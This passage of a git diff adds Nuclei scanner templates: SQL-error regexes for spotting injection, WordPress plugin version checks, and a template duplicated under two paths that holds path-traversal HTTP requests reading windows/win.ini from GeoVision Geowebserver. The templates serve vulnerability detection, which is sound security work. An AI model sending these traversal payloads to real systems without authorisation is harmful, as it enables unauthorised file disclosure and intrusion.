"Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + + - type: regex + name: Firebird + regex: + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + + - type: regex + name: SQLite + regex: + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + + - type: regex + name: SAPMaxDB + regex: + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + + - type: regex + name: Sybase + regex: + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + + - type: regex + name: Ingres + regex: + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + + - type: regex + name: FrontBase + regex: + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\." + + - type: regex + name: HSQLDB + regex: + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + + - type: regex + name: H2 + regex: + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + + - type: regex + name: MonetDB + regex: + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + + - type: regex + name: ApacheDerby + regex: + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + + - type: regex + name: Vertica + regex: + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + + - type: regex + name: Mckoi + regex: + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + + - type: regex + name: Presto + regex: + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + + - type: regex + name: Altibase + regex: + - "Altibase\\.jdbc\\.driver" + + - type: regex + name: MimerSQL + regex: + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + + - type: regex + name: CrateDB + regex: + - "io\\.crate\\.client\\.jdbc" + + - type: regex + name: Cache + regex: + - "encountered after end of query" + - "A comparison operator is required here" + + - type: regex + name: RaimaDatabaseManager + regex: + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + + - type: regex + name: Virtuoso + regex: + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" + + - type: regex + name: HQLSQL + regex: + - "org\\.hibernate\\.QueryException:" + - "org\\.hibernate\\.exception\\.SQLGrammarException" + - "mismatched input ''" + - '' + diff --git a/poc/web/geowebserver-lfi-xss.yaml b/poc/web/geowebserver-lfi-xss.yaml new file mode 100644 index 0000000000..181328a74d --- /dev/null +++ b/poc/web/geowebserver-lfi-xss.yaml @@ -0,0 +1,50 @@ +id: geovision-geowebserver-lfi-xss + +info: + name: GeoVision Geowebserver <= 5.3.3 - Local File Inclusion / Cross-Site Scripting + author: shamo0 + severity: high + description: | + GEOVISION GEOWEBSERVER <= 5.3.3 is vulnerable to several XSS, HTML Injection, and Local File Include (LFI) vectors. The application fails to properly sanitize user requests, allowing injection of HTML code and XSS, as well as client-side exploitation, including session theft. + reference: + - https://www.geovision.com.tw/cyber_security.php + - https://www.exploit-db.com/exploits/50211 + metadata: + verified: true + max-request: 3 + shodan-query: title:"Geowebserver" + tags: geovision,geowebserver,lfi,xss + +http: + - raw: + - | + GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name= HTTP/1.1 + Host: {{Hostname}} + + - | + POST /Visitor/bin/WebStrings.srf?obj_name=win.ini HTTP/1.1 + Host: {{Hostname}} + Content-Length: 0 + + - | + GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: or + matchers: + - type: dsl + name: lfi + dsl: + - 'contains_all(body, "for 16-bit", "[fonts]", "[extensions]")' + - 'contains(content_type, "application/octet-stream")' + - 'status_code == 200' + condition: and + + - type: dsl + name: xss + dsl: + - 'contains_all(body, "={\"AeDebug")' + - 'contains(content_type, "text/html")' + - 'status_code == 200' + condition: and +# digest: 4a0a00473045022073fb6629bd8a91705b1061035210bcd66d24136bb813085100ac437c95f8270f022100cb45f86cc14cf6cd92ce6bac43aa9e3e4c202a1df313a7489b1855c0cb36dfa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/wordpress/spotify-play-button-for-wordpress-6157ddc840ff3aaacb724f29e67883ff.yaml b/poc/wordpress/spotify-play-button-for-wordpress-6157ddc840ff3aaacb724f29e67883ff.yaml new file mode 100644 index 0000000000..0033c6e313 --- /dev/null +++ b/poc/wordpress/spotify-play-button-for-wordpress-6157ddc840ff3aaacb724f29e67883ff.yaml @@ -0,0 +1,59 @@ +id: spotify-play-button-for-wordpress-6157ddc840ff3aaacb724f29e67883ff + +info: + name: > + Spotify Play Button for WordPress <= 2.11 - Authenticated (Contributor+) Stored Cross-Site Scripting via spotifyplaybutton Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a52e43dd-46b4-445b-b350-a2fd76315869?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/spotify-play-button-for-wordpress/" + google-query: inurl:"/wp-content/plugins/spotify-play-button-for-wordpress/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,spotify-play-button-for-wordpress,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/spotify-play-button-for-wordpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "spotify-play-button-for-wordpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.11') \ No newline at end of file diff --git a/poc/wordpress/wordpress-popup-be069733ca362578f99c68a45b934c7d.yaml b/poc/wordpress/wordpress-popup-be069733ca362578f99c68a45b934c7d.yaml new file mode 100644 index 0000000000..396d085b20 --- /dev/null +++ b/poc/wordpress/wordpress-popup-be069733ca362578f99c68a45b934c7d.yaml @@ -0,0 +1,59 @@ +id: wordpress-popup-be069733ca362578f99c68a45b934c7d + +info: + name: > + Hustle – Email Marketing, Lead Generation, Optins, Popups <= 7.8.5 - Missing Authorization to Unpublished Form Exposure + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ebd96d9c-c1ab-4a53-a52a-9fc2541482f2?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wordpress-popup/" + google-query: inurl:"/wp-content/plugins/wordpress-popup/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wordpress-popup,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wordpress-popup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wordpress-popup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.8.5') \ No newline at end of file diff --git a/poc/wordpress/wp-parsidate-7b898c57c30032aff3f3e6faaf604680.yaml b/poc/wordpress/wp-parsidate-7b898c57c30032aff3f3e6faaf604680.yaml new file mode 100644 index 0000000000..79ec306445 --- /dev/null +++ b/poc/wordpress/wp-parsidate-7b898c57c30032aff3f3e6faaf604680.yaml @@ -0,0 +1,59 @@ +id: wp-parsidate-7b898c57c30032aff3f3e6faaf604680 + +info: + name: > + Parsi Date <= 5.1.1 - Reflected Cross-Site Scripting via add_query_arg Parameter + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/72383bd3-82b4-4aea-9a1c-277ad06e2500?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-parsidate/" + google-query: inurl:"/wp-content/plugins/wp-parsidate/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-parsidate,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-parsidate/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-parsidate" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.1.1') \ No newline at end of file diff --git a/poc/xss/geowebserver-lfi-xss.yaml b/poc/xss/geowebserver-lfi-xss.yaml new file mode 100644 index 0000000000..181328a74d --- /dev/null +++ b/poc/xss/geowebserver-lfi-xss.yaml @@ -0,0 +1,50 @@ +id: geovision-geowebserver-lfi-xss + +info: + name: GeoVision Geowebserver <= 5.3.3 - Local File Inclusion / Cross-Site Scripting + author: shamo0 + severity: high + description: | + GEOVISION GEOWEBSERVER <= 5.3.3 is vulnerable to several XSS, HTML Injection, and Local File Include (LFI) vectors. The application fails to properly sanitize user requests, allowing injection of HTML code and XSS, as well as client-side exploitation, including session theft. + reference: + - https://www.geovision.com.tw/cyber_security.php + - https://www.exploit-db.com/exploits/50211 + metadata: + verified: true + max-request: 3 + shodan-query: title:"Geowebserver" + tags: geovision,geowebserver,lfi,xss + +http: + - raw: + - | + GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name= HTTP/1.1 + Host: {{Hostname}} + + - | + POST /Visitor/bin/WebStrings.srf?obj_name=win.ini HTTP/1.1 + Host: {{Hostname}} + Content-Length: 0 + + - | + GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: or + matchers: + - type: dsl + name: lfi + dsl: + - 'contains_all(body, "for 16-bit", "[fonts]", "[extensions]")' + - 'contains(content_type, "application/octet-stream")' + - 'status_code == 200' + condition: and + + - type: dsl + name: xss + dsl: + - 'contains_all(body, "={\"AeDebug")' + - 'contains(content_type, "text/html")' + - 'status_code == 200' + condition: and +# digest: 4a0a00473045022073fb6629bd8a91705b1061035210bcd66d24136bb813085100ac437c95f8270f022100cb45f86cc14cf6cd92ce6bac43aa9e3e4c202a1df313a7489b1855c0cb36dfa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file